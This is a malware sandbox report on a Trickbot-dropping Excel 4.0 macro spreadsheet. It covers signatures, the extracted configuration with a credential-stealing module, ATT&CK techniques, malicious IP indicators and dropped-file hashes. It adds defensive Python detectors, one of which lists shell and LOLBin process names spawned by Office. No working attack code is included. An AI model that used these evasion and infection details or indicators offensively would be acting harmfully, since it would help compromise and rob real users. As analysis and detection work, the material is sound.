Analysis Report Sign-1870635479_637332644.xls
Overview
General Information
Detection
Detection name | Score | Range | Whitelisted | Confidence |
---|---|---|---|---|
Hidden Macro 4.0 Trickbot | 100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match
Classification and Startup (process tree): graphics only, not reproduced in this extract.
Malware Configuration |
---|
Threatname: Trickbot |
---|
{"gtag": "rob60", "C2 list": [], "modules": ["pwgrab", "mcconf"]}
The extractor recovered the group tag (gtag rob60) and the module list (pwgrab, the browser credential grabber that matches the "Tries to harvest and steal browser information" signature, and mcconf) but an empty C2 list; for network indicators, use the IPs this report marks as malicious under Contacted IPs.
Yara Overview |
---|
Initial Sample |
---|
Rule | Description | Author |
---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
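The rule above fires on the BIFF records that make an XLM document auto-run: a macro sheet (often hidden or very hidden) plus a built-in Auto_Open defined name. The following is an added example, not code from this report or from Joe Sandbox, that parses those two records (BoundSheet8 and Lbl, layouts per MS-XLS) out of a raw Workbook stream and returns the same verdict. The Workbook stream is constructed inline so the script runs offline; on a real .xls you would obtain it with olefile (`olefile.OleFileIO(path).openstream("Workbook").read()`), and a FILEPASS-encrypted workbook (the VelvetSweatshop default-password trick) will not expose its records to this parser.

```python
"""Scan a raw BIFF8 Workbook stream for Excel 4.0 (XLM) macro indicators.

Added example, not code from the report or from Joe Sandbox. Record layouts
follow MS-XLS: BoundSheet8 (0x0085) carries the sheet type and hidden state,
Lbl (0x0018) carries defined names, including the built-in Auto_Open.
A constructed Workbook stream is embedded so the script runs offline.
"""
import struct

BOF, EOF, BOUNDSHEET, LBL = 0x0809, 0x000A, 0x0085, 0x0018
HS_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}
# Built-in name codes (MS-XLS) that make Excel run a macro on open/close/activate.
BUILTIN_AUTORUN = {0x01: "Auto_Open", 0x02: "Auto_Close",
                   0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
AUTORUN_TEXT = {v.lower() for v in BUILTIN_AUTORUN.values()}


def iter_records(stream):
    """Yield (type, payload) for each BIFF record; a truncated trailer is ignored."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        pos += 4
        yield rtype, stream[pos:pos + rlen]
        pos += rlen


def _xl_string(buf, cch):
    """XLUnicodeStringNoCch: 1 flag byte (bit 0 = UTF-16), then cch characters."""
    high = buf[0] & 0x01
    raw = buf[1:1 + cch * (2 if high else 1)]
    return raw.decode("utf-16-le" if high else "latin-1"), raw


def parse_boundsheet(payload):
    """lbPlyPos(4) | hsState (low 2 bits of 1 byte) | dt(1) | cch(1) | string."""
    if len(payload) < 8:
        return None
    hs_state, dt, cch = payload[4] & 0x03, payload[5], payload[6]
    name, _ = _xl_string(payload[7:], cch)
    return name, HS_STATE.get(hs_state, "reserved"), SHEET_TYPE.get(dt, "0x%02x" % dt)


def parse_lbl(payload):
    """flags(2) chKey(1) cch(1) cce(2) res(2) itab(2) res(4) | name | rgce formula."""
    if len(payload) < 15:
        return None
    flags, _chkey, cch = struct.unpack_from("<HBB", payload, 0)
    builtin, hidden = bool(flags & 0x0020), bool(flags & 0x0001)
    name, raw = _xl_string(payload[14:], cch)
    if builtin:  # built-in names are stored as a one-byte code, not as text
        name = BUILTIN_AUTORUN.get(raw[0], "builtin_0x%02x" % raw[0])
    return name, builtin, hidden


def scan_workbook_stream(stream):
    """Return macro sheets, auto-run names and an overall verdict."""
    macro_sheets, autorun = [], []
    for rtype, payload in iter_records(stream):
        if rtype == BOUNDSHEET:
            parsed = parse_boundsheet(payload)
            if parsed and parsed[2] == "macro sheet":
                macro_sheets.append((parsed[0], parsed[1]))
        elif rtype == LBL:
            parsed = parse_lbl(payload)
            if parsed and parsed[0].lower() in AUTORUN_TEXT:
                autorun.append((parsed[0], parsed[2]))  # (name, hidden flag)
    return {
        "macro_sheets": macro_sheets,
        "autorun_names": autorun,
        "hidden_macro_sheet": any(s != "visible" for _, s in macro_sheets),
        # An XLM sheet plus an auto-run name is the combination the report flags.
        "suspicious": bool(macro_sheets) and bool(autorun),
    }


# --- constructed test data (not taken from the analysed sample) -------------
def _rec(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload


def _boundsheet(name, hs_state, dt):
    return _rec(BOUNDSHEET, struct.pack("<IBBBB", 0, hs_state, dt, len(name), 0) + name.encode("latin-1"))


def _lbl(builtin_code=None, text=None, flags=0, formula=b""):
    rgb = bytes([builtin_code]) if builtin_code is not None else text.encode("latin-1")
    if builtin_code is not None:
        flags |= 0x0020  # fBuiltin
    head = struct.pack("<HBBHHHBBBB", flags, 0, len(rgb), len(formula), 0, 0, 0, 0, 0, 0)
    return _rec(LBL, head + b"\x00" + rgb + formula)


_BOF = _rec(BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0, 0, 0, 0))
# Very-hidden XLM macro sheet plus a hidden Auto_Open name whose formula starts
# with ptgRef3d (0x3A): the layout behind the "Hidden Macro 4.0" detection name.
MALICIOUS_STREAM = (_BOF + _boundsheet("Sheet1", 0, 0x00) + _boundsheet("Macro1", 2, 0x01)
                    + _lbl(builtin_code=0x01, flags=0x0001, formula=b"\x3a" + b"\x00" * 6)
                    + _rec(EOF, b""))
BENIGN_STREAM = (_BOF + _boundsheet("Sheet1", 0, 0x00)
                 + _lbl(text="SalesTotal", formula=b"\x3a" + b"\x00" * 6) + _rec(EOF, b""))

if __name__ == "__main__":
    for label, stream in (("malicious", MALICIOUS_STREAM), ("benign", BENIGN_STREAM)):
        print(label, scan_workbook_stream(stream))
```

The verdict is deliberately narrow: it reproduces what the Yara rule keys on. An XLM sheet can also run from a visible sheet, from formulas in cells rather than names, or behind a FILEPASS record, so treat a negative result as "no auto-run name found", not as "no macro".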
Memory Dumps |
---|
Rule | Description | Author | Matches |
---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | 5 shown, 1 further entry collapsed in the original report |
Unpacked PEs |
---|
Rule | Description | Author | Matches |
---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | 2 |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell (rule authors: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team)
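The rule body is not on the page. As an added example (not the Sigma rule's own text and not the report's), the block below reconstructs its parent/child logic over constructed Sysmon-style process-creation events and adds a short ancestor walk so that children of the spawned loader are still attributed to Office. The process-name lists are my approximation of the rule's selections, not a verbatim copy; the excel.exe -> rundll32.exe chain is illustrative, chosen because the report's ATT&CK matrix marks Rundll32.

```python
"""Process-tree check for Office applications spawning a shell or LOLBin.

Added example, not the Sigma rule's own body: OFFICE_PARENTS and
SHELL_CHILDREN are a representative reconstruction of what "Microsoft Office
Product Spawning Windows Shell" selects on. Events are constructed
Sysmon-style process-creation records, not the report's.
"""

OFFICE_PARENTS = ("\\winword.exe", "\\excel.exe", "\\powerpnt.exe", "\\mspub.exe",
                  "\\visio.exe", "\\outlook.exe", "\\msaccess.exe", "\\onenote.exe")
SHELL_CHILDREN = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\wscript.exe",
                  "\\cscript.exe", "\\mshta.exe", "\\rundll32.exe", "\\regsvr32.exe",
                  "\\msiexec.exe", "\\wmic.exe", "\\schtasks.exe", "\\certutil.exe")


def _ends_with_any(path, suffixes):
    return path.lower().endswith(suffixes)


def office_spawns_shell(event):
    """Direct match: Office parent, shell/LOLBin child (the rule's own condition)."""
    return (_ends_with_any(event["ParentImage"], OFFICE_PARENTS)
            and _ends_with_any(event["Image"], SHELL_CHILDREN))


def office_ancestor(event, by_pid, max_depth=4):
    """Walk ParentProcessId links to find an Office process further up the tree.

    Catches excel.exe -> rundll32.exe -> cmd.exe chains that the direct
    parent/child match misses once the loader spawns its own children.
    """
    current, depth = event, 0
    while depth < max_depth:
        parent = by_pid.get(current["ParentProcessId"])
        if parent is None:
            return None
        if _ends_with_any(parent["Image"], OFFICE_PARENTS):
            return parent["Image"]
        current, depth = parent, depth + 1
    return None


def detect(events):
    """Return (direct matches, indirect matches) as lists of (Image, Office image)."""
    by_pid = {e["ProcessId"]: e for e in events}
    direct, indirect = [], []
    for e in events:
        if office_spawns_shell(e):
            direct.append((e["Image"], e["ParentImage"]))
        elif _ends_with_any(e["Image"], SHELL_CHILDREN):
            anc = office_ancestor(e, by_pid)
            if anc:
                indirect.append((e["Image"], anc))
    return direct, indirect


# Constructed events (Office14 = Office 2010, the report's analysis system).
EXCEL = "C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE"
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": "C:\\Windows\\explorer.exe",
     "ParentImage": "C:\\Windows\\System32\\userinit.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": EXCEL,
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": "C:\\Windows\\System32\\rundll32.exe",
     "ParentImage": EXCEL},
    {"ProcessId": 400, "ParentProcessId": 300, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\rundll32.exe"},
    {"ProcessId": 500, "ParentProcessId": 100, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},  # user-launched shell, must not fire
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Expect tuning in production: Office legitimately spawns a few helpers (printing and protected-view processes, for instance), and the real rule carries exclusions for them; the ancestor walk is the part worth keeping, since an injected or spawned loader quickly hides the Office parent from a plain parent/child match.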
Signature Overview |
---|
Source values (file paths, URLs, IP addresses, code addresses) were not captured in this extract; each signature below lists the kinds of sources the report cites and how many of each.
AV Detection: |
---|
Antivirus detection for URL or domain: Avira URL Cloud (1)
Found malware configuration: Malware Configuration Extractor (1)
Multi AV Scanner detection for dropped file: ReversingLabs (2)
Yara detected Trickbot: File source (1); Code function (1)
Compliance: |
---|
Uses insecure TLS / SSL version for HTTPS connection: HTTPS traffic detected (4)
Uses new MSVCR Dlls: File opened (1)
Binary contains paths to debug symbols: Binary string (1); Code function (3)
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files): File created (1)
Document exploit detected (UrlDownloadToFile): Section loaded (1)
Document exploit detected (process start blacklist hit): Process created (1)
Further sources in this category (signature names not captured): Memory has grown (1); Code function (22); DNS query (1); TCP traffic (2)
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules): Snort IDS (5)
Further sources in this category (signature names not captured): TCP traffic (2); IP Address (4); ASN Name (2); JA3 fingerprint (2); HTTP traffic detected (2); HTTPS traffic detected (4); TCP traffic detected without corresponding DNS query (50); File created (1); String found in binary or memory (48); DNS traffic detected (1); Network traffic detected (10)
The fifty TCP connections without a preceding DNS query are the strongest network signal in this report: the sample connects to IP addresses that nothing in the capture resolved, which is consistent with the IP-based C2 list Trickbot carries in its configuration, and it is the signal that remains usable here even though the extracted configuration's C2 list is empty.
E-Banking Fraud: |
---|
Yara detected Trickbot: File source (1)
System Summary: |
---|
Found malicious Excel 4.0 Macro: Initial sample (1)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros): Screenshot OCR (6)
Found Excel 4.0 Macro with suspicious formulas: Initial sample (1)
Office process drops PE file: File created (2)
Further sources in this category (signature names not captured): Memory allocated (2); Code function (41); OLE indicator, VBA macros (1); Dropped File (2); Matched rule (1); Binary or memory string (1); Classification label (1); File created (7); Mutant created (1); OLE indicator, Workbook stream (1); System information queried (1); File read (5); Key opened (2); Process created (13); Key value queried (1); Window detected (1); File opened (1); Binary string (1)
Boot Survival: |
---|
Drops PE files to the user root directory: File created (1)
Further sources in this category (signature names not captured): Registry key monitored for changes (1); Process information set (30)
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread): Function Chain (1)
Tries to detect virtualization through RDTSC time measurements: RDTSC instruction interceptor (1)
Further sources in this category (signature names not captured): Code function (11); Dropped PE file which has not been started (1); Thread sleep time (1); Last function (2)
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes: Memory allocated (1)
Writes to foreign memory regions: Memory written (2)
Further sources in this category (signature names not captured): Process created (4); Binary or memory string (3); Queries volume information (1); Key value queried (1); Registry key created or modified (1)
Stealing of Sensitive Information: |
---|
Yara detected Trickbot (two listings): File source (1); File source (7)
Tries to harvest and steal browser information (history, passwords, etc): File opened (4)
Remote Access Functionality: |
---|
Yara detected Trickbot (two listings): File source (1); File source (7)
Mitre Att&ck Matrix |
---|
The original matrix lists every technique in the navigator; only the techniques the report marked with signature-hit superscripts are kept here, grouped by tactic, with the superscripts reproduced as extracted (concatenated digits in parentheses). Tactics with no hits (Initial Access, Persistence, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects, Impact) are omitted.
Tactic | Techniques (hit superscripts as extracted) |
---|---|
Execution | Scripting (21); Native API (1); Exploitation for Client Execution (33) |
Privilege Escalation | Extra Window Memory Injection (1); Access Token Manipulation (1); Process Injection (212) |
Defense Evasion | Disable or Modify Tools (21); Scripting (21); Obfuscated Files or Information (2); Extra Window Memory Injection (1); Masquerading (121); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (212); Rundll32 (1) |
Credential Access | OS Credential Dumping (1) |
Discovery | File and Directory Discovery (2); System Information Discovery (114); Query Registry (1); Security Software Discovery (22); Virtualization/Sandbox Evasion (1); Process Discovery (2); Remote System Discovery (1); System Network Configuration Discovery (1) |
Collection | Archive Collected Data (1); Data from Local System (1) |
Command and Control | Ingress Tool Transfer (2); Encrypted Channel (22); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13) |
Behavior Graph and Screenshots: graphics only (behavior graph, screenshot slideshow and thumbnails), not reproduced in this extract.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample: no antivirus matches.
Dropped Files: two dropped PE files (names not captured), each with the same scanner results:
Detection | Scanner | Label |
---|---|---|
11% | Metadefender | |
41% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files: no antivirus matches.
Domains: three domains (names not captured), Virustotal detection 0%, 1% and 2%.
URLs: 42 entries (URL strings not captured); one flagged by Avira URL Cloud at 100% as malware, the remaining 41 rated safe at 0% (8 by Avira URL Cloud, 33 by URL Reputation).
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Reputation |
---|---|---|---|---|
ident.me | 176.58.123.25 | true | false | unknown |
chipmania.it | 185.81.0.78 | true | false | unknown |
38.52.17.84.zen.spamhaus.org | unknown | unknown | false | high |
38.52.17.84.cbl.abuseat.org | unknown | unknown | false | high |
38.52.17.84.dnsbl-1.uceprotect.net | unknown | unknown | false | unknown |
www.chipmania.it | unknown | unknown | false | unknown |
38.52.17.84.b.barracudacentral.org | unknown | unknown | false | high |
38.52.17.84.spam.dnsbl.sorbs.net | unknown | unknown | false | high |
No antivirus detection was recorded for any of these names. ident.me is a public-IP echo service, and the five 38.52.17.84.* names are reverse-octet DNS blocklist lookups for 84.17.52.38 (presumably the analysis host's own egress address as returned by ident.me): the sample learns its public IP and checks it against spam blocklists. None of these hosts is malicious and they should not be blocked as indicators, but the lookup pattern itself is a usable detection.
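Two checks fall out of this traffic picture: connections to public IPs that no DNS answer resolved (the fifty rows under Networking) and reverse-octet DNSBL lookups of the host's own public address. The block below is an added example, not part of the Joe Sandbox report: it runs both checks over constructed DNS and connection events (Zeek-style fields, made up here) that use the hosts this report lists, namely ident.me, www.chipmania.it, the five blocklist zones and the IPs marked malicious under Contacted IPs; timestamps and ports are invented.

```python
"""Two network checks drawn from this report's traffic picture.

Added example, not part of the Joe Sandbox report. Runs over constructed DNS
and connection events (Zeek-style fields, made up here) built from the hosts
the report lists; timestamps and ports are invented.
"""
import ipaddress
from collections import defaultdict

# Blocklist zones seen in the report's Contacted Domains.
DNSBL_ZONES = ("zen.spamhaus.org", "cbl.abuseat.org", "dnsbl-1.uceprotect.net",
               "b.barracudacentral.org", "spam.dnsbl.sorbs.net")

DNS_LOG = [  # constructed
    {"ts": 100.0, "query": "ident.me", "answers": ["176.58.123.25"]},
    {"ts": 101.0, "query": "38.52.17.84.zen.spamhaus.org", "answers": []},
    {"ts": 101.1, "query": "38.52.17.84.cbl.abuseat.org", "answers": []},
    {"ts": 101.2, "query": "38.52.17.84.dnsbl-1.uceprotect.net", "answers": []},
    {"ts": 101.3, "query": "38.52.17.84.b.barracudacentral.org", "answers": []},
    {"ts": 101.4, "query": "38.52.17.84.spam.dnsbl.sorbs.net", "answers": []},
    {"ts": 102.0, "query": "www.chipmania.it", "answers": ["185.81.0.78"]},
]
CONN_LOG = [  # constructed; all ports invented
    {"ts": 100.2, "dst": "176.58.123.25", "dport": 443},   # ident.me, resolved first
    {"ts": 102.3, "dst": "185.81.0.78", "dport": 443},     # chipmania.it, resolved
    {"ts": 103.0, "dst": "45.155.173.242", "dport": 443},  # never resolved
    {"ts": 104.0, "dst": "5.202.150.151", "dport": 443},   # never resolved
    {"ts": 104.5, "dst": "193.8.194.96", "dport": 443},    # never resolved
    {"ts": 105.0, "dst": "192.168.2.15", "dport": 445},    # internal, ignored
]


def connections_without_dns(conn_log, dns_log):
    """Outbound TCP to public IPs that no earlier DNS answer resolved.

    This is what the report logs fifty times; Trickbot typically carries its
    C2 servers as IP:port pairs in its configuration, so these connections
    are the network signal that survives an empty extracted C2 list.
    """
    answers = [(e["ts"], a) for e in dns_log for a in e["answers"]]
    flagged = []
    for c in conn_log:
        if not ipaddress.ip_address(c["dst"]).is_global:
            continue  # RFC 1918, loopback and link-local targets are never DNS-resolved anyway
        if not any(ts <= c["ts"] and a == c["dst"] for ts, a in answers):
            flagged.append((c["dst"], c["dport"]))
    return flagged


def dnsbl_self_checks(dns_log, zones=DNSBL_ZONES):
    """Map IPv4 -> blocklist zones for queries shaped <reversed octets>.<zone>."""
    hits = defaultdict(set)
    for e in dns_log:
        labels = e["query"].lower().rstrip(".").split(".")
        for zone in zones:
            zl = zone.split(".")
            if len(labels) == 4 + len(zl) and labels[-len(zl):] == zl:
                octets = labels[:4]
                if all(o.isdigit() and int(o) <= 255 for o in octets):
                    hits[".".join(reversed(octets))].add(zone)
    return {ip: sorted(z) for ip, z in hits.items()}


if __name__ == "__main__":
    print("unresolved destinations:", connections_without_dns(CONN_LOG, DNS_LOG))
    print("DNSBL self-checks:", dnsbl_self_checks(DNS_LOG))
```

On real logs, give the DNS answer cache a TTL-bounded window rather than "any earlier answer", and exclude destinations learned over non-DNS channels (DoH, hard-coded update servers in legitimate software), or the first check will drown in false positives. The second check is low-noise: mail servers query DNSBLs for remote client addresses, but an endpoint querying five zones for its own public IP right after an IP-echo lookup is the sequence this sample shows.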
Contacted URLs |
---|
One URL (string not captured): Malicious true, Reputation unknown, no antivirus detection recorded.
URLs from Memory and Binaries |
---|
29 URLs (strings not captured), none marked malicious and none with an antivirus detection; Reputation high for 10, low for 2, unknown for 17.
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
45.155.173.242 | unknown | Germany | 30823 | COMBAHTONcombahtonGmbHDE | true |
5.202.150.151 | unknown | Iran (Islamic Republic of) | 201150 | DIDEHABNNETIR | true |
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false |
194.5.249.156 | unknown | Romania | 64398 | NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | false |
193.8.194.96 | unknown | United Kingdom | 53340 | FIBERHUBUS | true |
103.220.47.220 | unknown | Indonesia | 59290 | IDNIC-ALTRO-IDPTAltroAbiramaID | false |
176.58.123.25 | unknown | United Kingdom | 63949 | LINODE-APLinodeLLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355634 |
Start date: | 20.02.2021 |
Start time: | 09:47:13 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 48s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | Sign-1870635479_637332644.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 10 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.spyw.expl.evad.winXLS@12/14@8/7 |
EGA Information: | Failed |
HCA Information: | Failed |
Technologies, HDC Information, Cookbook Comments and Warnings: not captured in this extract.
The run ended on timeout after 7m 48s and produced a light report, and the evasion section notes that execution stopped while the process was sleeping; later-stage behaviour such as module retrieval after that sleep may therefore be missing from this report.
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
09:47:46 | API Interceptor | (not captured) |
09:47:46 | API Interceptor | (not captured) |
09:48:50 | API Interceptor | (not captured) |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
45.155.173.242 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
5.202.150.151 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
185.81.0.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
194.5.249.156 | Get hash | malicious | Browse | ||
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ident.me | | | malicious | | |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | | | malicious | | |
COMBAHTONcombahtonGmbHDE | | | malicious | | |
DIDEHABNNETIR | | | malicious | | |
SERVERPLAN-ASIT | | | malicious | | |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
05af1f5ca1b87cc9cc9b25185115607d | | | malicious | | |
8c4a22651d328568ec66382a84fc505f | | | malicious | | |
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | | | malicious | | |
C:\Users\user\BASE.BABAA | | | malicious | | |
Created / dropped Files |
---|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: | |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 893 |
Entropy (8bit): | 7.366016576663508 |
Encrypted: | false |
SSDEEP: | 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x |
MD5: | D4AE187B4574036C2D76B6DF8A8C1A30 |
SHA1: | B06F409FA14BAB33CBAF4A37811B8740B624D9E5 |
SHA-256: | A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7 |
SHA-512: | 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: | |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.0908522464605643 |
Encrypted: | false |
SSDEEP: | 6:kKwaPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:3W3kPlE99SNxAhUeo+aKt |
MD5: | DBAC0F4F367066518103C7836B446107 |
SHA1: | 624845187C47C0AB5B186CFFD05A74E7FA8D7A71 |
SHA-256: | 283E817992CADBAF9E3198C1B7181C08D172F7719C2ACDD25F5806891A41E374 |
SHA-512: | 9B3ACF465E611D6BCB8206F160B704FDFE7B24D1436FFCA21B64E744A1750F5EED0B508769193876CBA13EE544F62F64140EC4DA48E6F9554E872C2B11EA31B0 |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 3.018531379206123 |
Encrypted: | false |
SSDEEP: | 3:kkFklYQltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKtwnliBAIdQZV7eAYLit |
MD5: | 89B0055866A7A1585BBC1D3FAE86B411 |
SHA1: | FB63F73ADD62C9D5957D10076F740E9CC1AAEABF |
SHA-256: | 6D57DC7645218A8D6260AA82625BD20D81AD51810CFD7EA71909CFF154F3FFCD |
SHA-512: | C0E2214F8CA852832058F16A669707C408BD442203926DD656E4007430AED448480FFDA6F0185DF488A97C73CF786F12114911B88D77F8B0DE8C4DE9CA8B7C70 |
Malicious: | false |
Reputation: | low |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
